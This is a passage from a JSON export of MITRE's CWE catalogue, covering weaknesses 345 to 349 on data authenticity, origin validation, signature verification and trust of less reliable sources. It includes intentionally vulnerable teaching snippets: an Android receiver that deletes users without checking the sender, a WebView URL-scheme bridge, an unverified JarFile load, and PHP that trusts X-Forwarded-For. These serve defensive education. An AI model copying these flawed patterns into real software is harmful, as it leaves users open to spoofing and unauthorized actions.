Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Static Value in Unpredictable Context","attr":{"@_Date":"2008-04-11"}}}},"345":{"attr":{"@_ID":"345","@_Name":"Insufficient Verification of Data Authenticity","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Verification of Data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":12,"Entry_Name":"Content Spoofing"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"111"}},{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"148"}},{"attr":{"@_CAPEC_ID":"218"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}},{"attr":{"@_CAPEC_ID":"665"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 15: Not Updating Easily.&#34; Page 231"}}},"Notes":{"Note":[{"#text":"\\"origin validation\\" could fall under this.","attr":{"@_Type":"Relationship"}},{"#text":"The specific ways in which the origin is not properly identified should be laid out as separate weaknesses. In some sense, this is more like a category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Insufficient Verification of Data","attr":{"@_Date":"2008-04-11"}}}},"346":{"attr":{"@_ID":"346","@_Name":"Origin Validation Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly verify that the source of data or communication is valid.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Varies by Context"],"Note":"An attacker can access any functionality that is inadvertently accessible to the source."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-112"},"Intro_Text":"This Android application will remove a user account when it receives an intent to do so:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.RemoveUser\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class DeleteReceiver extends BroadcastReceiver {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"int userID = intent.getIntExtra(\\"userID\\");destroyUserData(userID);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file."},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1218","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1218"},{"Reference":"CVE-2005-0877","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0877"},{"Reference":"CVE-2001-1452","Description":"DNS server caches glue records received from non-delegated name servers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1452"},{"Reference":"CVE-2005-2188","Description":"user ID obtained from untrusted source (URL)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2188"},{"Reference":"CVE-2003-0174","Description":"LDAP service does not verify if a particular attribute was set by the LDAP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0174"},{"Reference":"CVE-1999-1549","Description":"product does not sufficiently distinguish external HTML from internal, potentially dangerous HTML, allowing bypass using special strings in the page title. Overlaps special elements.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1549"},{"Reference":"CVE-2003-0981","Description":"product records the reverse DNS name of a visitor in the logs, allowing spoofing and resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0981"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Origin Validation Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"111"}},{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"160"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}},{"attr":{"@_CAPEC_ID":"510"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"75"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"89"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-324"}}},"Notes":{"Note":[{"#text":"This entry has some significant overlap with other CWE entries and may need some clarification. See terminology notes.","attr":{"@_Type":"Maintenance"}},{"#text":"The \\"Origin Validation Error\\" term was originally used in a 1995 thesis [REF-324]. Although not formally defined, an issue is considered to be an origin validation error if either (1) \\"an object [accepts] input from an unauthorized subject,\\" or (2) \\"the system [fails] to properly or completely authenticate a subject.\\" A later section says that an origin validation error can occur when the system (1) \\"does not properly authenticate a user or process\\" or (2) \\"does not properly authenticate the shared data or libraries.\\" The only example provided in the thesis (covered by OSVDB:57615) involves a setuid program running command-line arguments without dropping privileges. So, this definition (and its examples in the thesis) effectively cover other weaknesses such as CWE-287 (Improper Authentication), CWE-285 (Improper Authorization), and CWE-250 (Execution with Unnecessary Privileges). There appears to be little usage of this term today, except in the SecurityFocus vulnerability database, where the term is used for a variety of issues, including web-browser problems that allow violation of the Same Origin Policy and improper validation of the source of an incoming message.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Maintenance_Notes, References, Relationship_Notes, Relationships, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Terminology_Notes"}]}},"347":{"attr":{"@_ID":"347","@_Name":"Improper Verification of Cryptographic Signature","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not verify, or incorrectly verifies, the cryptographic signature for data.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity","Confidentiality"],"Impact":["Gain Privileges or Assume Identity","Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could gain access to sensitive data and possibly execute unauthorized code."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following code, a JarFile object is created from a downloaded file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"File f = new File(downloadedFilePath);JarFile jf = new JarFile(f);","xhtml:br":""}},"Body_Text":"The JAR file that was potentially downloaded from an untrusted source is created without verifying the signature (if present). An alternate constructor that accepts a boolean verify parameter should be used instead."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1796","Description":"Does not properly verify signatures for \\"trusted\\" entities.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1796"},{"Reference":"CVE-2005-2181","Description":"Insufficient verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2181"},{"Reference":"CVE-2005-2182","Description":"Insufficient verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2182"},{"Reference":"CVE-2002-1706","Description":"Accepts a configuration file without a Message Integrity Check (MIC) signature.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1706"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improperly Verified Signature"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"463"}},{"attr":{"@_CAPEC_ID":"475"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Improperly Verified Signature","attr":{"@_Date":"2009-05-27"}}}},"348":{"attr":{"@_ID":"348","@_Name":"Use of Less Trusted Source","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"An attacker could utilize the untrusted data source to bypass protection mechanisms and gain access to sensitive data."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to limit the access of a page to certain IP Addresses. It checks the \'HTTP_X_FORWARDED_FOR\' header in case an authorized user is sending the request through a proxy.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$requestingIP = \'0.0.0.0\';if (array_key_exists(\'HTTP_X_FORWARDED_FOR\', $_SERVER)) {else{}if(in_array($requestingIP,$ipAllowlist)){}else{}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$requestingIP = $_SERVER[\'HTTP_X_FORWARDED_FOR\'];","attr":{"@_style":"margin-left:10px;"}},{"#text":"$requestingIP = $_SERVER[\'REMOTE_ADDR\'];","attr":{"@_style":"margin-left:10px;"}},{"#text":"generatePage();return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \\"You are not authorized to view this page\\";return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_Nature":"good","@_Language":"PHP"},"xhtml:div":{"#text":"$requestingIP = \'0.0.0.0\';if (array_key_exists(\'HTTP_X_FORWARDED_FOR\', $_SERVER)) {else{}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"echo \\"This application cannot be accessed through a proxy.\\";return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"$requestingIP = $_SERVER[\'REMOTE_ADDR\'];","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"..."}}],"Body_Text":["The \'HTTP_X_FORWARDED_FOR\' header can be user controlled and so should never be trusted. An attacker can falsify the header to gain access to the page.","This fixed code only trusts the \'REMOTE_ADDR\' header and so avoids the issue:","Be aware that \'REMOTE_ADDR\' can still be spoofed. This may seem useless because the server will send the response to the fake address and not the attacker, but this may still be enough to conduct an attack. For example, if the generatePage() function in this code is resource intensive, an attacker could flood the server with fake requests using an authorized IP and consume significant resources. This could be a serious DoS attack even though the attacker would never see the page\'s sensitive content."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0860","Description":"Product uses IP address provided by a client, instead of obtaining it from the packet headers, allowing easier spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0860"},{"Reference":"CVE-2004-1950","Description":"Web product uses the IP address in the X-Forwarded-For HTTP header instead of a server variable that uses the connecting IP address, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1950"},{"Reference":"BID:15326","Description":"Similar to CVE-2004-1950","Link":"http://www.securityfocus.com/bid/15326/info"},{"Reference":"CVE-2001-0908","Description":"Product logs IP address specified by the client instead of obtaining it from the packet headers, allowing information hiding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0908"},{"Reference":"CVE-2006-1126","Description":"PHP application uses IP address from X-Forwarded-For HTTP header, instead of REMOTE_ADDR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1126"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Use of Less Trusted Source"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"85"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}]}},"349":{"attr":{"@_ID":"349","@_Name":"Acceptance of Extraneous Untrusted Data With Trusted Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":["Bypass Protection Mechanism","Modify Application Data"],"Note":"An attacker could package untrusted data with trusted data to bypass protection mechanisms to gain access to and possibly modify sensitive data."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0018","Description":"Does not verify that trusted entity is authoritative for all entities in its response.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0018"},{"Reference":"CVE-2006-5462","Description":"use of extra data in a signature allows certificate signature forging","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Untrusted Data Appended with Trusted Data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ENV01-J","Entry_Name":"Place all security-sensitive code in a single JAR and sign and seal it"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"75"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, 